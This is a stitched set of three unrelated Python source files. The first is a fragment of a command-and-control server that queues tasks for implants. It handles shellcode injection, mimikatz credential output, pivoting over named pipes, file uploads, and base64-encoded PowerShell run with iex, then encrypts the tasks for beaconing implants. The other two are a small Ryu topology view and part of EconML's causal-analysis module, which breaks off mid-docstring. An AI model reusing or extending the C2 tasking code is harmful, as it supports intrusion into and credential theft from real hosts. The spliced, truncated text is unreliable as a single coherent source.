DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('jxa'):
command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command=""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace("pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace("fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return default_response()
|
ryu/gui/views/topology.py | uiuc-srg/ryu | 269 | 17033 | # Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import render_template, request
import view_base
class IndexView(view_base.ViewBase):
def __init__(self):
super(IndexView, self).__init__()
def run(self):
host, port = request.host.split(':')
return render_template('topology.html', host=host, port=port)
|
econml/solutions/causal_analysis/_causal_analysis.py | huigangchen/EconML | 1,846 | 17041 | <filename>econml/solutions/causal_analysis/_causal_analysis.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Module for assessing causal feature importance."""
import warnings
from collections import OrderedDict, namedtuple
import joblib
import lightgbm as lgb
from numba.core.utils import erase_traceback
import numpy as np
from numpy.lib.function_base import iterable
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier, RandomForestRegressor
from sklearn.linear_model import Lasso, LassoCV, LogisticRegression, LogisticRegressionCV
from sklearn.pipeline import make_pipeline, Pipeline
from sklearn.preprocessing import OneHotEncoder, PolynomialFeatures, StandardScaler
from sklearn.tree import _tree
from sklearn.utils.validation import column_or_1d
from ...cate_interpreter import SingleTreeCateInterpreter, SingleTreePolicyInterpreter
from ...dml import LinearDML, CausalForestDML
from ...inference import NormalInferenceResults
from ...sklearn_extensions.linear_model import WeightedLasso
from ...sklearn_extensions.model_selection import GridSearchCVList
from ...utilities import _RegressionWrapper, inverse_onehot
# TODO: this utility is documented but internal; reimplement?
from sklearn.utils import _safe_indexing
# TODO: this utility is even less public...
from sklearn.utils import _get_column_indices
class _CausalInsightsConstants:
RawFeatureNameKey = 'raw_name'
EngineeredNameKey = 'name'
CategoricalColumnKey = 'cat'
TypeKey = 'type'
PointEstimateKey = 'point'
StandardErrorKey = 'stderr'
ZStatKey = 'zstat'
ConfidenceIntervalLowerKey = 'ci_lower'
ConfidenceIntervalUpperKey = 'ci_upper'
PValueKey = 'p_value'
Version = 'version'
CausalComputationTypeKey = 'causal_computation_type'
ConfoundingIntervalKey = 'confounding_interval'
ViewKey = 'view'
InitArgsKey = 'init_args'
RowData = 'row_data' # NOTE: RowData is mutually exclusive with the other data columns
ALL = [RawFeatureNameKey,
EngineeredNameKey,
CategoricalColumnKey,
TypeKey,
PointEstimateKey,
StandardErrorKey,
ZStatKey,
ConfidenceIntervalLowerKey,
ConfidenceIntervalUpperKey,
PValueKey,
Version,
CausalComputationTypeKey,
ConfoundingIntervalKey,
ViewKey,
InitArgsKey,
RowData]
def _get_default_shared_insights_output():
"""
Dictionary elements shared among all analyses.
In case of breaking changes to this dictionary output, the major version of this
dictionary should be updated. In case of a change to this dictionary, the minor
version should be updated.
"""
return {
_CausalInsightsConstants.RawFeatureNameKey: [],
_CausalInsightsConstants.EngineeredNameKey: [],
_CausalInsightsConstants.CategoricalColumnKey: [],
_CausalInsightsConstants.TypeKey: [],
_CausalInsightsConstants.Version: '1.0',
_CausalInsightsConstants.CausalComputationTypeKey: "simple",
_CausalInsightsConstants.ConfoundingIntervalKey: None,
_CausalInsightsConstants.InitArgsKey: {}
}
def _get_default_specific_insights(view):
# keys should be mutually exclusive with shared keys, so that the dictionaries can be cleanly merged
return {
_CausalInsightsConstants.PointEstimateKey: [],
_CausalInsightsConstants.StandardErrorKey: [],
_CausalInsightsConstants.ZStatKey: [],
_CausalInsightsConstants.ConfidenceIntervalLowerKey: [],
_CausalInsightsConstants.ConfidenceIntervalUpperKey: [],
_CausalInsightsConstants.PValueKey: [],
_CausalInsightsConstants.ViewKey: view
}
def _get_metadata_causal_insights_keys():
return [_CausalInsightsConstants.Version,
_CausalInsightsConstants.CausalComputationTypeKey,
_CausalInsightsConstants.ConfoundingIntervalKey,
_CausalInsightsConstants.ViewKey]
def _get_column_causal_insights_keys():
return [_CausalInsightsConstants.RawFeatureNameKey,
_CausalInsightsConstants.EngineeredNameKey,
_CausalInsightsConstants.CategoricalColumnKey,
_CausalInsightsConstants.TypeKey]
def _get_data_causal_insights_keys():
return [_CausalInsightsConstants.PointEstimateKey,
_CausalInsightsConstants.StandardErrorKey,
_CausalInsightsConstants.ZStatKey,
_CausalInsightsConstants.ConfidenceIntervalLowerKey,
_CausalInsightsConstants.ConfidenceIntervalUpperKey,
_CausalInsightsConstants.PValueKey]
def _first_stage_reg(X, y, *, automl=True, random_state=None, verbose=0):
if automl:
model = GridSearchCVList([LassoCV(random_state=random_state),
RandomForestRegressor(
n_estimators=100, random_state=random_state, min_samples_leaf=10),
lgb.LGBMRegressor(num_leaves=32, random_state=random_state)],
param_grid_list=[{},
{'min_weight_fraction_leaf':
[.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=3,
scoring='r2',
verbose=verbose)
best_est = model.fit(X, y).best_estimator_
if isinstance(best_est, LassoCV):
return Lasso(alpha=best_est.alpha_, random_state=random_state)
else:
return best_est
else:
model = LassoCV(cv=5, random_state=random_state).fit(X, y)
return Lasso(alpha=model.alpha_, random_state=random_state)
def _first_stage_clf(X, y, *, make_regressor=False, automl=True, min_count=None, random_state=None, verbose=0):
# use same Cs as would be used by default by LogisticRegressionCV
cs = np.logspace(-4, 4, 10)
if min_count is None:
min_count = _CAT_LIMIT # we have at least this many instances
if automl:
# NOTE: we don't use LogisticRegressionCV inside the grid search because of the nested stratification
# which could affect how many times each distinct Y value needs to be present in the data
model = GridSearchCVList([LogisticRegression(max_iter=1000,
random_state=random_state),
RandomForestClassifier(n_estimators=100, min_samples_leaf=10,
random_state=random_state),
lgb.LGBMClassifier(num_leaves=32, random_state=random_state)],
param_grid_list=[{'C': cs},
{'max_depth': [3, None],
'min_weight_fraction_leaf': [.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=min(3, min_count),
scoring='neg_log_loss',
verbose=verbose)
est = model.fit(X, y).best_estimator_
else:
model = LogisticRegressionCV(
cv=min(5, min_count), max_iter=1000, Cs=cs, random_state=random_state).fit(X, y)
est = LogisticRegression(C=model.C_[0], max_iter=1000, random_state=random_state)
if make_regressor:
return _RegressionWrapper(est)
else:
return est
def _final_stage(*, random_state=None, verbose=0):
return GridSearchCVList([WeightedLasso(random_state=random_state),
RandomForestRegressor(n_estimators=100, random_state=random_state, verbose=verbose)],
param_grid_list=[{'alpha': [.001, .01, .1, 1, 10]},
{'max_depth': [3, 5],
'min_samples_leaf': [10, 50]}],
cv=3,
scoring='neg_mean_squared_error',
verbose=verbose)
# simplification of sklearn's ColumnTransformer that encodes categoricals and passes through selected other columns
# but also supports get_feature_names with expected signature
class _ColumnTransformer(TransformerMixin):
def __init__(self, categorical, passthrough):
self.categorical = categorical
self.passthrough = passthrough
def fit(self, X):
cat_cols = _safe_indexing(X, self.categorical, axis=1)
if cat_cols.shape[1] > 0:
self.has_cats = True
# NOTE: set handle_unknown to 'ignore' so that we don't throw at runtime if given a novel value
self.one_hot_encoder = OneHotEncoder(sparse=False,
handle_unknown='ignore').fit(cat_cols)
else:
self.has_cats = False
self.d_x = X.shape[1]
return self
def transform(self, X):
rest = _safe_indexing(X, self.passthrough, axis=1)
if self.has_cats:
cats = self.one_hot_encoder.transform(_safe_indexing(X, self.categorical, axis=1))
# NOTE: we rely on the passthrough columns coming first in the concatenated X;W
# when we pipeline scaling with our first stage models later, so the order here is important
return np.hstack((rest, cats))
else:
return rest
def get_feature_names(self, names=None):
if names is None:
names = [f"x{i}" for i in range(self.d_x)]
rest = _safe_indexing(names, self.passthrough, axis=0)
if self.has_cats:
cats = self.one_hot_encoder.get_feature_names(
_safe_indexing(names, self.categorical, axis=0))
return np.concatenate((rest, cats))
else:
return rest
# Wrapper to make sure that we get a deep copy of the contents instead of clone returning an untrained copy
class _Wrapper:
def __init__(self, item):
self.item = item
class _FrozenTransformer(TransformerMixin, BaseEstimator):
def __init__(self, wrapper):
self.wrapper = wrapper
def fit(self, X, y):
return self
def transform(self, X):
return self.wrapper.item.transform(X)
def _freeze(transformer):
return _FrozenTransformer(_Wrapper(transformer))
# Convert python objects to (possibly nested) types that can easily be represented as literals
def _sanitize(obj):
if obj is None or isinstance(obj, (bool, int, str, float)):
return obj
elif isinstance(obj, dict):
return {_sanitize(key): _sanitize(obj[key]) for key in obj}
else:
try:
return [_sanitize(item) for item in obj]
except Exception:
raise ValueError(f"Could not sanitize input {obj}")
# Convert SingleTreeInterpreter to a python dictionary
def _tree_interpreter_to_dict(interp, features, leaf_data=lambda t, n: {}):
tree = interp.tree_model_.tree_
node_dict = interp.node_dict_
def recurse(node_id):
if tree.children_left[node_id] == _tree.TREE_LEAF:
return {'leaf': True, 'n_samples': tree.n_node_samples[node_id], **leaf_data(tree, node_id, node_dict)}
else:
return {'leaf': False, 'feature': features[tree.feature[node_id]], 'threshold': tree.threshold[node_id],
'left': recurse(tree.children_left[node_id]),
'right': recurse(tree.children_right[node_id])}
return recurse(0)
class _PolicyOutput:
"""
A type encapsulating various information related to a learned policy.
Attributes
----------
tree_dictionary:dict
The policy tree represented as a dictionary,
policy_value:float
The average value of applying the recommended policy (over using the control),
always_treat:dict of string to float
A dictionary mapping each non-control treatment to the value of always treating with it (over control),
control_name:string
The name of the control treatment
"""
def __init__(self, tree_dictionary, policy_value, always_treat, control_name):
self.tree_dictionary = tree_dictionary
self.policy_value = policy_value
self.always_treat = always_treat
self.control_name = control_name
# named tuple type for storing results inside CausalAnalysis class;
# must be lifted to module level to enable pickling
_result = namedtuple("_result", field_names=[
"feature_index", "feature_name", "feature_baseline", "feature_levels", "hinds",
"X_transformer", "W_transformer", "estimator", "global_inference", "treatment_value"])
def _process_feature(name, feat_ind, verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
nuisance_models, h_model, random_state, model_y, cv, mc_iters):
try:
if verbose > 0:
print(f"CausalAnalysis: Feature {name}")
discrete_treatment = feat_ind in categorical_inds
if discrete_treatment:
cats = categories[categorical_inds.index(feat_ind)]
else:
cats = 'auto' # just leave the setting at the default otherwise
# the transformation logic here is somewhat tricky; we always need to encode the categorical columns,
# whether they end up in X or in W. However, for the continuous columns, we want to scale them all
# when running the first stage models, but don't want to scale the X columns when running the final model,
# since then our coefficients will have odd units and our trees will also have decisions using those units.
#
# we achieve this by pipelining the X scaling with the Y and T models (with fixed scaling, not refitting)
hinds = heterogeneity_inds[feat_ind]
WX_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind]),
('drop', 'drop', feat_ind)],
remainder=StandardScaler())
W_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind and ind not in hinds]),
('drop', 'drop', hinds),
('drop_feat', 'drop', feat_ind)],
remainder=StandardScaler())
X_cont_inds = [ind for ind in hinds
if ind != feat_ind and ind not in categorical_inds]
# Use _ColumnTransformer instead of ColumnTransformer so we can get feature names
X_transformer = _ColumnTransformer([ind for ind in categorical_inds
if ind != feat_ind and ind in hinds],
X_cont_inds)
# Controls are all other columns of X
WX = WX_transformer.fit_transform(X)
# can't use X[:, feat_ind] when X is a DataFrame
T = _safe_indexing(X, feat_ind, axis=1)
# TODO: we can't currently handle unseen values of the feature column when getting the effect;
# we might want to modify OrthoLearner (and other discrete treatment classes)
# so that the user can opt-in to allowing unseen treatment values
# (and return NaN or something in that case)
W = W_transformer.fit_transform(X)
X_xf = X_transformer.fit_transform(X)
# HACK: this is slightly ugly because we rely on the fact that DML passes [X;W] to the first stage models
# and so we can just peel the first columns off of that combined array for rescaling in the pipeline
# TODO: consider addding an API to DML that allows for better understanding of how the nuisance inputs are
# built, such as model_y_feature_names, model_t_feature_names, model_y_transformer, etc., so that this
# becomes a valid approach to handling this
X_scaler = ColumnTransformer([('scale', StandardScaler(),
list(range(len(X_cont_inds))))],
remainder='passthrough').fit(np.hstack([X_xf, W])).named_transformers_['scale']
X_scaler_fixed = ColumnTransformer([('scale', _freeze(X_scaler),
list(range(len(X_cont_inds))))],
remainder='passthrough')
if W.shape[1] == 0:
# array checking routines don't accept 0-width arrays
W = None
if X_xf.shape[1] == 0:
X_xf = None
if verbose > 0:
print("CausalAnalysis: performing model selection on T model")
# perform model selection
model_t = (_first_stage_clf(WX, T, automl=nuisance_models == 'automl',
min_count=min_counts.get(feat_ind, None),
random_state=random_state, verbose=verbose)
if discrete_treatment else _first_stage_reg(WX, T, automl=nuisance_models == 'automl',
random_state=random_state,
verbose=verbose))
pipelined_model_t = Pipeline([('scale', X_scaler_fixed),
('model', model_t)])
pipelined_model_y = Pipeline([('scale', X_scaler_fixed),
('model', model_y)])
if X_xf is None and h_model == 'forest':
warnings.warn(f"Using a linear model instead of a forest model for feature '{name}' "
"because forests don't support models with no heterogeneity indices")
h_model = 'linear'
if h_model == 'linear':
est = LinearDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
fit_cate_intercept=True,
linear_first_stages=False,
categories=cats,
random_state=random_state,
cv=cv,
mc_iters=mc_iters)
elif h_model == 'forest':
est = CausalForestDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
n_estimators=4000,
min_var_leaf_on_val=True,
categories=cats,
random_state=random_state,
verbose=verbose,
cv=cv,
mc_iters=mc_iters)
if verbose > 0:
print("CausalAnalysis: tuning forest")
est.tune(y, T, X=X_xf, W=W)
if verbose > 0:
print("CausalAnalysis: training causal model")
est.fit(y, T, X=X_xf, W=W, cache_values=True)
# Prefer ate__inference to const_marginal_ate_inference(X) because it is doubly-robust and not conservative
if h_model == 'forest' and discrete_treatment:
global_inference = est.ate__inference()
else:
# convert to NormalInferenceResults for consistency
inf = est.const_marginal_ate_inference(X=X_xf)
global_inference = NormalInferenceResults(d_t=inf.d_t, d_y=inf.d_y,
pred=inf.mean_point,
pred_stderr=inf.stderr_mean,
mean_pred_stderr=None,
inf_type='ate')
# Set the dictionary values shared between local and global summaries
if discrete_treatment:
cats = est.transformer.categories_[0]
baseline = cats[est.transformer.drop_idx_[0]]
cats = cats[np.setdiff1d(np.arange(len(cats)),
est.transformer.drop_idx_[0])]
d_t = len(cats)
insights = {
_CausalInsightsConstants.TypeKey: ['cat'] * d_t,
_CausalInsightsConstants.RawFeatureNameKey: [name] * d_t,
_CausalInsightsConstants.CategoricalColumnKey: cats.tolist(),
_CausalInsightsConstants.EngineeredNameKey: [
f"{name} (base={baseline}): {c}" for c in cats]
}
treatment_value = 1
else:
d_t = 1
cats = ["num"]
baseline = None
insights = {
_CausalInsightsConstants.TypeKey: ["num"],
_CausalInsightsConstants.RawFeatureNameKey: [name],
_CausalInsightsConstants.CategoricalColumnKey: [name],
_CausalInsightsConstants.EngineeredNameKey: [name]
}
# calculate a "typical" treatment value, using the mean of the absolute value of non-zero treatments
treatment_value = np.mean(np.abs(T[T != 0]))
result = _result(feature_index=feat_ind,
feature_name=name,
feature_baseline=baseline,
feature_levels=cats,
hinds=hinds,
X_transformer=X_transformer,
W_transformer=W_transformer,
estimator=est,
global_inference=global_inference,
treatment_value=treatment_value)
return insights, result
except Exception as e:
return e
# Unless we're opting into minimal cross-fitting, this is the minimum number of instances of each category
# required to fit a discrete DML model
_CAT_LIMIT = 10
class CausalAnalysis:
"""
Note: this class is experimental and the API may evolve over our next few releases.
Gets causal importance of features.
Parameters
----------
feature_inds: array-like of int, str, or bool
The features for which to estimate causal effects, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
categorical: array-like of int, str, or bool
The features which are categorical in nature, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
heterogeneity_inds: array-like of int, str, or bool, or None or list of array-like elements or None, default None
If a 1d array, then whenever estimating a heterogeneous (local) treatment effect
model, then only the features in this array will be used for heterogeneity. If a 2d
array then its first dimension should be len(feature_inds) and whenever estimating
a local causal effect for target feature feature_inds[i], then only features in
heterogeneity_inds[i] will be used for heterogeneity. If heterogeneity_inds[i]=None, then all features
are used for heterogeneity when estimating local causal effect for feature_inds[i], and likewise if
heterogeneity_inds[i]=[] then no features will be used for heterogeneity. If heterogeneity_ind=None
then all features are used for heterogeneity for all features, and if heterogeneity_inds=[] then
no features will be.
feature_names: list of str, default None
The names for all of the features in the data. Not necessary if the input will be a dataframe.
If None and the input is a plain numpy array, generated feature names will be ['X1', 'X2', ...].
upper_bound_on_cat_expansion: int, default 5
The maximum number of categorical values allowed, because they are expanded via one-hot encoding. If a
feature has more than this many values, then a causal effect model is not fitted for that target feature
and a warning flag is raised. The remainder of the models are fitted.
classification: bool, default False
Whether this is a classification (as opposed to regression) task
TODO. Enable also multi-class classification (post-MVP)
nuisance_models: one of {'linear', 'automl'}, optional (default='linear')
What models to use for nuisance estimation (i.e. for estimating propensity models or models of how
controls predict the outcome). If 'linear', then LassoCV (for regression) and LogisticRegressionCV
(for classification) are used. If 'automl', then a kfold cross-validation and model selection is performed
among several models and the best is chosen.
TODO. Add other options, such as {'azure_automl', 'forests', 'boosting'} that will use particular sub-cases
of models or also integrate with azure autoML. (post-MVP)
heterogeneity_model: one of {'linear', 'forest'}, optional (default='linear')
What type of model to use for treatment effect heterogeneity. 'linear' means that a heterogeneity model
of the form theta(X)=<a, X> will be used, while 'forest' means that a forest model will be trained instead.
TODO. Add other options, such as {'automl'} for performing
model selection for the causal effect, or {'sparse_linear'} for using a debiased lasso. (post-MVP)
categories: 'auto' or list of ('auto' or list of values), default 'auto'
What categories to use for the categorical columns. If 'auto', then the categories will be inferred for
all categorical columns; otherwise this argument should have as many entries as there are categorical columns,
and each entry should be either 'auto' to infer the values for that column or the list of values for the
